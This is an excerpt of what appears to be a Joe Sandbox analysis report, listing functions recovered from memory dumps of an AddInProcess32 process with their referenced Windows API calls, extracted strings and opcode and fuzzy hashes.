Instruction Fuzzy Hash: F1E171B0B0031A8FDB24DF69D4906AEBBB2FF89315F11856AD405AB344DB35EC46CB91

Function 07DD9238 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 07DD927F
$q, xrefs: 07DD928B
$q, xrefs: 07DD92C6
$q, xrefs: 07DD92BA

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: d4ec1b6b5aa0f9a3b8f1b4c5855196c8a3ce40043353a92dc8092d6b1bfda160
Instruction ID: 12191b94dacbf408660140c62c287fef9ca3219a5bd0aa099ddb1ab7f31bd2f7
Opcode Fuzzy Hash: d4ec1b6b5aa0f9a3b8f1b4c5855196c8a3ce40043353a92dc8092d6b1bfda160
Instruction Fuzzy Hash: A6916270B0021A8FDB54DF69D9607AEBBF2FF88340F108569D8199B344EE75ED428B91

Function 07DDEC38 Relevance: 4.2, Strings: 3, Instructions: 414
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 07DDEEF3
DZj, xrefs: 07DDED1B
DZj, xrefs: 07DDECAE

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: DZj$DZj$Hq
API String ID: 0-2566370726
Opcode ID: baabe7652cec679d858d2a23dce9d4347b04fb0556d571b2a85de37d301d0a44
Instruction ID: 41f46d0eb7fb5ae4cbf75c41e984dc0be1b9e46a9cd42c727ea25055f6dffa48
Opcode Fuzzy Hash: baabe7652cec679d858d2a23dce9d4347b04fb0556d571b2a85de37d301d0a44
Instruction Fuzzy Hash: 83E16970A003168FDB24DBA9C8506AEFBE6BF89310F248529D4169F358DB75EC46CB91

Function 07DB07C0 Relevance: 4.1, Strings: 3, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xq, xrefs: 07DB0A9B
xq, xrefs: 07DB0A63
>XGq, xrefs: 07DB081C

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: >XGq$xq$xq
API String ID: 0-3078909612
Opcode ID: b3bba8f95ebcedc09de7257d1cf889f603b81b92d991bcaa434549fbbb3eb296
Instruction ID: 3ba095db302eaf9e1630129193bae360337494ae08073098dde2a9d3781dd5c2
Opcode Fuzzy Hash: b3bba8f95ebcedc09de7257d1cf889f603b81b92d991bcaa434549fbbb3eb296
Instruction Fuzzy Hash: D2B1CFB1A003158FDB29DF74D8506AEBBF2FF89214B14856EC04AAB350DB35ED06CB91

Function 07DBD778 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Oq, xrefs: 07DBD953
fq, xrefs: 07DBD7A3
XPq, xrefs: 07DBD8C9

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: fq$XPq$\Oq
API String ID: 0-132346853
Opcode ID: db508b626edc3d257e99634e61acf589c3b3374de14d3f11428a80e44a78d47c
Instruction ID: 755750d1b1295959f5ba78129508ee882a2ec3dd50e8e4177d91b7425bcdf6da
Opcode Fuzzy Hash: db508b626edc3d257e99634e61acf589c3b3374de14d3f11428a80e44a78d47c
Instruction Fuzzy Hash: F5618170B002199FDB249BB5C8547EEBBF6FF88310F24852AD146AB394DB758C458B91

Function 066B9CB5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 066BA531

Strings

LgEq, xrefs: 066B9C7C

Memory Dump Source

Source File: 00000006.00000002.1566846233.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_66b0000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID: LgEq
API String ID: 2289755597-387063766
Opcode ID: f7bcaad624209686d65721b98d100a41a20fbe95f97459f6f68d1461555daa1c
Instruction ID: 50254af03d88c71ccc3284037bd21fa62c305624b53a97d37a9777eb45acb001
Opcode Fuzzy Hash: f7bcaad624209686d65721b98d100a41a20fbe95f97459f6f68d1461555daa1c
Instruction Fuzzy Hash: 2B4110B1C0071DCBEB25CFA9C8847DDBBB1AF48314F20816AD408AB251DB756986CF90

Function 07DD11BE Relevance: 2.8, Strings: 2, Instructions: 292COMMON

Download Yara Rule

Strings

t]Zj, xrefs: 07DD12CD
4aZj, xrefs: 07DD1397

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: 4aZj$t]Zj
API String ID: 0-4262756836
Opcode ID: aa08cf599cf8d94933f5664c8f481eea83232b33388ce25e9b499ceae277edfe
Instruction ID: 93cd23de2d2150c03b32cde477458dbc6371e9f1cbd2eb2f5e403843cb6e1a85
Opcode Fuzzy Hash: aa08cf599cf8d94933f5664c8f481eea83232b33388ce25e9b499ceae277edfe
Instruction Fuzzy Hash: 6DC16DB4B00209DFCB15DFA4E494AADBBB2FF88310F054559E906AB3A1DB35EC46CB51

Function 07DD3D21 Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

(q, xrefs: 07DD3FBC
(q, xrefs: 07DD4011

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: (q$(q
API String ID: 0-2485164810
Opcode ID: 40fb6f2410811f0fd006d72fbbc177a611422e0d8489823a85bbd59e23d379ec
Instruction ID: 2fbaed1719892dd351d09de53a106187e6d6f4707865812c2aed9d82add0f75b
Opcode Fuzzy Hash: 40fb6f2410811f0fd006d72fbbc177a611422e0d8489823a85bbd59e23d379ec
Instruction Fuzzy Hash: A25103B0B003169FDB15AB78A86466EFBE2FFC9210B148569D449DB381DF38DC41C7A6

Function 07DD9228 Relevance: 2.7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

$q, xrefs: 07DD927F
$q, xrefs: 07DD92BA

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: e754090032fa9e2f8a35306d07b1f81867ab1e7be0042af3f96279e060a18cf8
Instruction ID: 751e2f0c2e441a7057645ad2f478f59a723d8ad23661d30dd724ed1a90d192fc
Opcode Fuzzy Hash: e754090032fa9e2f8a35306d07b1f81867ab1e7be0042af3f96279e060a18cf8
Instruction Fuzzy Hash: 2A519071B002059FCB54DB79D9A0BAEBFE6FF88340F108569D819DB344EA35EC428B90

Function 07DBD76B Relevance: 2.6, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

fq, xrefs: 07DBD7A3
XPq, xrefs: 07DBD8C9

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: fq$XPq
API String ID: 0-3167736908
Opcode ID: a6da6402c35aa336e21ec63bf6c1769db03c855cb150f8c4a61cfd7722971c27
Instruction ID: 1e038873d6edded816d8289eb1297a5f54034ca3d6ba7c32e43b7137d2731e5c
Opcode Fuzzy Hash: a6da6402c35aa336e21ec63bf6c1769db03c855cb150f8c4a61cfd7722971c27
Instruction Fuzzy Hash: 91518070B002199FDB149FA9C8547AEBBF6FF88710F24852AE146AB394DE758C418B91

Function 07DB0968 Relevance: 2.6, Strings: 2, Instructions: 119COMMON

Download Yara Rule

Strings

xq, xrefs: 07DB0A9B
xq, xrefs: 07DB0A63

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: xq$xq
API String ID: 0-2333185093
Opcode ID: da743b05a402968a28fc9f5cb90f53f3175941cbdc41d1e68938742c466c2674
Instruction ID: 1a67cf6e083b8242714a4e15fd4936120b0506697a7f9e8f052bf4f94c17ac7a
Opcode Fuzzy Hash: da743b05a402968a28fc9f5cb90f53f3175941cbdc41d1e68938742c466c2674
Instruction Fuzzy Hash: E4414AB46007019FD729DF39D45069ABBF2FF85208724CA6DD04A9B751DB36F906CB90

Function 07DDD788 Relevance: 2.5, Strings: 2, Instructions: 41COMMON

Download Yara Rule

Strings

|Zj, xrefs: 07DDD7E4
Z[j, xrefs: 07DDD7CA

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Z[j$|Zj
API String ID: 0-2294672500
Opcode ID: bf8c06a61f85b3b4494777572b18eb57303e64bff92b8f05b053989d2ebe89e9
Instruction ID: 0b399bbe252db7d935db517312bb66421dfc9066b4fd155f8b05aa95c3b6af1c
Opcode Fuzzy Hash: bf8c06a61f85b3b4494777572b18eb57303e64bff92b8f05b053989d2ebe89e9
Instruction Fuzzy Hash: 010126316003006FC311EB30E85088EBBAAFECA2113048A7ED0454F615DFB9BD0B8BE5

Function 013DBCC8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1553626397.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_13d0000_AddInProcess32.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 987183865b8ac879375c507d004dfa982619eb1f9da3207094ae2c98a71df8ac
Instruction ID: 0e37826f124741e965630e8b9fc717f4e55e61849c0087bc49e44e9f1d8c84f9
Opcode Fuzzy Hash: 987183865b8ac879375c507d004dfa982619eb1f9da3207094ae2c98a71df8ac
Instruction Fuzzy Hash: B9714671A00B058FE724DF2AE45075ABBF5FF89204F008A2DE58AD7B54DB35E849CB91

Function 066B2BA8 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1566846233.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_66b0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072b97ed62c3d62d083ef6ccb5f1812d3a685e447d712f14d1033a4fd1dd7670
Instruction ID: d931dabbf7f8067265bad2f7f02568f6b29636d3395d974b7378b003d6a4dbb6
Opcode Fuzzy Hash: 072b97ed62c3d62d083ef6ccb5f1812d3a685e447d712f14d1033a4fd1dd7670
Instruction Fuzzy Hash: 7E412371D043998FCB14DFA9D8147EEBBF5AF89220F15856AD804E7340DB349985CBE0

Function 05A98444 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A98562

Memory Dump Source

Source File: 00000006.00000002.1565583666.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a90000_AddInProcess32.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: abc09cd14598143238464ea9fb1ed36f22d907e7579f8fb2d978a152da6b79aa
Instruction ID: 9d785aca745b102d5809ac87276e99715f8082afda9831c04827e6edeb9084a8
Opcode Fuzzy Hash: abc09cd14598143238464ea9fb1ed36f22d907e7579f8fb2d978a152da6b79aa
Instruction Fuzzy Hash: D651AEB1D003599FDF14CFAAC894ADEBBF5BF49310F64812AE819AB210D7759845CF90

Function 05A95F80 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A98562

Memory Dump Source

Source File: 00000006.00000002.1565583666.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a90000_AddInProcess32.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 860e0e6c30bdfdb25a0f35df2bd3f058706d12d217a431acdc8d563f690886d9
Instruction ID: 66457edc4abe193102cf15b379a9ea17b96cb31504f19365afb697854d26880b
Opcode Fuzzy Hash: 860e0e6c30bdfdb25a0f35df2bd3f058706d12d217a431acdc8d563f690886d9
Instruction Fuzzy Hash: 5751BDB1D003199FDF14CF9AC894ADEBBF5BF49310F64812AE819AB210D775A885CF90

Function 066BA474 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 066BA531

Memory Dump Source

Source File: 00000006.00000002.1566846233.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_66b0000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 889a000493757280d75e375a5b24351b39c3f1701ec96a6c023354922584a280
Instruction ID: 110d0fcacfa39b9894d49627bf97139fe38578f79987a03f4f31687f7bd272dd
Opcode Fuzzy Hash: 889a000493757280d75e375a5b24351b39c3f1701ec96a6c023354922584a280
Instruction Fuzzy Hash: 7441EFB1C00719CBEB25CFA9C884BDDBBF5BF48304F20816AD408AB255DB756A86CF50

Function 05A99384 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05A9AC61

Memory Dump Source

Source File: 00000006.00000002.1565583666.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a90000_AddInProcess32.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 83639f2f993910fe2b46a647d1d62ac504bcb4406d24792b9f99784ae08b1b3a
Instruction ID: 710c58038a340d545dc5ce54acf8dd8e639ad01688125d1782a5a79e9b1db1e9
Opcode Fuzzy Hash: 83639f2f993910fe2b46a647d1d62ac504bcb4406d24792b9f99784ae08b1b3a
Instruction Fuzzy Hash: 804108B5900319CFDB18CF99C489FAABBF5FF88314F248459E519AB321D735A841CBA4

Function 066B9C44 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 066BA531

Memory Dump Source

Source File: 00000006.00000002.1566846233.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_66b0000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2915d8c40f6d78b036dd6f33561f93b5f82c9970204932e5f4b5e6f838e43072
Instruction ID: 241830cc394326504d17e6c32ba1764ea72dd935772c286928f8a53e22fcd8b4
Opcode Fuzzy Hash: 2915d8c40f6d78b036dd6f33561f93b5f82c9970204932e5f4b5e6f838e43072
Instruction Fuzzy Hash: 2441CFB1C0071DCBEB24DFA9C884BDDBBB5BF48304F20816AD408AB251DB756986CF90

Function 06367048 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1565702278.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6360000_AddInProcess32.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 4f7a5762b569f71e0b58fb2f750f3c3dd0031d111bf6f61c1a5cfb78640ab377
Instruction ID: bda97c2a63c0a35a09c740e5a07042ee7b3d13ab9b279deed9a88ab069946229
Opcode Fuzzy Hash: 4f7a5762b569f71e0b58fb2f750f3c3dd0031d111bf6f61c1a5cfb78640ab377
Instruction Fuzzy Hash: 83318B719043499FCB12DFAAC841ADEBFF8EF09350F14805AF954A7261C7369954CFA1

Function 07DD6150 Relevance: 1.6, Strings: 1, Instructions: 328COMMON

Download Yara Rule

Strings

(_q, xrefs: 07DD6238

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: (_q
API String ID: 0-3590916094
Opcode ID: 9a5d60d0ac12d4a512517a3b5dcf713bcf24137bc08d54d1e127347479dfe253
Instruction ID: 2dd7b54566434fa6ad9b90d7af375eb1a732496f5abfe2b03fc3e5df25ca1771
Opcode Fuzzy Hash: 9a5d60d0ac12d4a512517a3b5dcf713bcf24137bc08d54d1e127347479dfe253
Instruction Fuzzy Hash: 2AC1CD71A042098FCB14DFA8D954A9DBBF1FF89300F14856AE446AB260EB34ED46CB91

Function 05A9E204 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 05A9E298

Memory Dump Source

Source File: 00000006.00000002.1565583666.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a90000_AddInProcess32.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 38dbab9dc4f70b4726a3ff3783a2a5a54de512661f7479f11f0a79b35fd3bfc6
Instruction ID: f7ac3b1ae6747124a858c18ee347b34fa64250af3b7a17b36ca2dec9ffdcc3e6
Opcode Fuzzy Hash: 38dbab9dc4f70b4726a3ff3783a2a5a54de512661f7479f11f0a79b35fd3bfc6
Instruction Fuzzy Hash: 5331FEB0D01259DFDF24DF9AC988BCEBBF5BF48304F248069E404AB291DB75A845CB65

Function 05A9DBD8 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 05A9E298

Memory Dump Source

Source File: 00000006.00000002.1565583666.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a90000_AddInProcess32.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 47f9523cf9eeb5b97b0585ef07ce65a4cbc8139e4c001f67c30526f21ae568a6
Instruction ID: ae08f1fae3a52e5676f16e913e4a1d3d7eceb974fdedcb49409f21ae700d5a1f
Opcode Fuzzy Hash: 47f9523cf9eeb5b97b0585ef07ce65a4cbc8139e4c001f67c30526f21ae568a6
Instruction Fuzzy Hash: 9D3101B0D01228DFDF24DF99C988BCEBBF9BF48304F248069E404AB291DB75A845CB55

Function 05A98657 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 05A986F5

Memory Dump Source

Source File: 00000006.00000002.1565583666.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a90000_AddInProcess32.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: da7a287114df6c1ac50c707d8714ca2d5ab32aea129594da8c4d7343b9fa39e9
Instruction ID: cad0f0469f88043ce2e4a9e218b25320849fcf665cd47602855bd94ccfad6807
Opcode Fuzzy Hash: da7a287114df6c1ac50c707d8714ca2d5ab32aea129594da8c4d7343b9fa39e9
Instruction Fuzzy Hash: 79217AB580028ADFCB11DFA5D949BCABFF4FF49310F14845AD815A7211C339A904CFA1

Function 066B2550 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,066B2BFA), ref: 066B2CE7

Memory Dump Source

Source File: 00000006.00000002.1566846233.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_66b0000_AddInProcess32.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 996e08d727a0aff0567c96cb9c03bd14a2d740e30c481210cebcb88926e27c5a
Instruction ID: 9963b2bcd06d9ae2acc5930ff70312878886ff9d3635e4331297fe816a10a94b
Opcode Fuzzy Hash: 996e08d727a0aff0567c96cb9c03bd14a2d740e30c481210cebcb88926e27c5a
Instruction Fuzzy Hash: 22218CB1C0435A9FDB10DFAAC4447DEBBF4AF49220F01815AD854A7281D774A945CFA5

Function 066B25D7 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,066B2BFA), ref: 066B2CE7

Memory Dump Source

Source File: 00000006.00000002.1566846233.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_66b0000_AddInProcess32.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: c043f354f24516803e691b1a2bfe6fdfed3eab4c0144f49f7e2e88ea82d34d1a
Instruction ID: 2823a5a5707f6223197f60398142562bf40ddde6ca934a03cd4a0594ed9cae60
Opcode Fuzzy Hash: c043f354f24516803e691b1a2bfe6fdfed3eab4c0144f49f7e2e88ea82d34d1a
Instruction Fuzzy Hash: 3E2138B1C0025ADBDB60DF9AD8457EEFBF4AF08320F14812AD814A7241D738AA45CFA5

Function 013DBF50 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,013DBCE4), ref: 013DBF1E

Part of subcall function 013DBA00: LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,013DBF99,00000800,00000000,00000000), ref: 013DC1AA

Memory Dump Source

Source File: 00000006.00000002.1553626397.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_13d0000_AddInProcess32.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 09914c93d182fe304a71afdab5babe1d644f89e0e1886d4ea8a0790dc07175f2
Instruction ID: c104ce3e5bf4ebeb0ac60a15ffd11311e16da35a16328c5f3dd79b033e179a46
Opcode Fuzzy Hash: 09914c93d182fe304a71afdab5babe1d644f89e0e1886d4ea8a0790dc07175f2
Instruction Fuzzy Hash: 6311B672A002099FDB14DB5EF440BAAF7F9EBC5718F154469D509D3244C6759805CFA0

Function 066B2C78 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,066B2BFA), ref: 066B2CE7

Memory Dump Source

Source File: 00000006.00000002.1566846233.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_66b0000_AddInProcess32.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: e137a1754985509161be469ccf5165a4c888e36f5f8f53ea5f1c9df40f473a7c
Instruction ID: 74a7eae3de99f9dcfe6a5e18c878fa3c6ca265b8cd79828078615dbff44853aa
Opcode Fuzzy Hash: e137a1754985509161be469ccf5165a4c888e36f5f8f53ea5f1c9df40f473a7c
Instruction Fuzzy Hash: AB11F2B1C0065A9BCB20DF9AD945BDEFBF4EB48320F10816AD818A7240D778A945CFE1

Function 06365B74 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06367062,?,?,?,?,?), ref: 06367107

Memory Dump Source

Source File: 00000006.00000002.1565702278.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6360000_AddInProcess32.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 3ea0d011962fa0d0c8cefa1ddbce77743c17e03880c8c19c1a48fc41e3d6a94d
Instruction ID: c8c36c552486a8b7f0edb6a4bf1bfb4036faf59181313e9b319debf21627e968
Opcode Fuzzy Hash: 3ea0d011962fa0d0c8cefa1ddbce77743c17e03880c8c19c1a48fc41e3d6a94d
Instruction Fuzzy Hash: 3E11597580034D9FDB20DF9AC844BDEBFF8EB48310F54841AE914A7250C335A954CFA0

Function 066B256C Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,066B2BFA), ref: 066B2CE7

Memory Dump Source

Source File: 00000006.00000002.1566846233.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_66b0000_AddInProcess32.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 3e1c83502ab90aabcdf425aa3d02c36bc9bdcc82d02eafc76e8627a2c9aa8bb3
Instruction ID: fbceed810aeb86f00ac6663899dfaec9a4f6c40bb74d26032220e8442462d5d9
Opcode Fuzzy Hash: 3e1c83502ab90aabcdf425aa3d02c36bc9bdcc82d02eafc76e8627a2c9aa8bb3
Instruction Fuzzy Hash: 0C1124B1C0025A9BCB10DF9AC545BEEFBF4AB08210F10816AD814A7340D778A945CFA1

Function 013DBA00 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,013DBF99,00000800,00000000,00000000), ref: 013DC1AA

Memory Dump Source

Source File: 00000006.00000002.1553626397.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_13d0000_AddInProcess32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d9f5ccc9720adbbfc1eb89f7f9b758b082a82af3c8974d420fcb7bda8ad48538
Instruction ID: 260dd9ad7d6553fcfab3baf0f85addb2e5f37b2eab2cefe325f53f68256696ad
Opcode Fuzzy Hash: d9f5ccc9720adbbfc1eb89f7f9b758b082a82af3c8974d420fcb7bda8ad48538
Instruction Fuzzy Hash: 5D11F2B6D002099BDB24CFAAD844BDEFBF4AB48314F10842EE919A7200C775A945CFA5

Function 013DC138 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,013DBF99,00000800,00000000,00000000), ref: 013DC1AA

Memory Dump Source

Source File: 00000006.00000002.1553626397.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_13d0000_AddInProcess32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ab604f9b1134282f10e303b56505cb0f04d2348e2ee96a32ff4d96fbbfe2f79e
Instruction ID: 78b164fdf09dfbcb3fd7cfc5993aae34ee20b6f9d130c7f2500d27732f101894
Opcode Fuzzy Hash: ab604f9b1134282f10e303b56505cb0f04d2348e2ee96a32ff4d96fbbfe2f79e
Instruction Fuzzy Hash: F31106B6C002099FDB10CFAAD844ADEFBF4AF88314F10842EE919A7200C775A545CFA5

Function 0636AF20 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0636AF85

Memory Dump Source

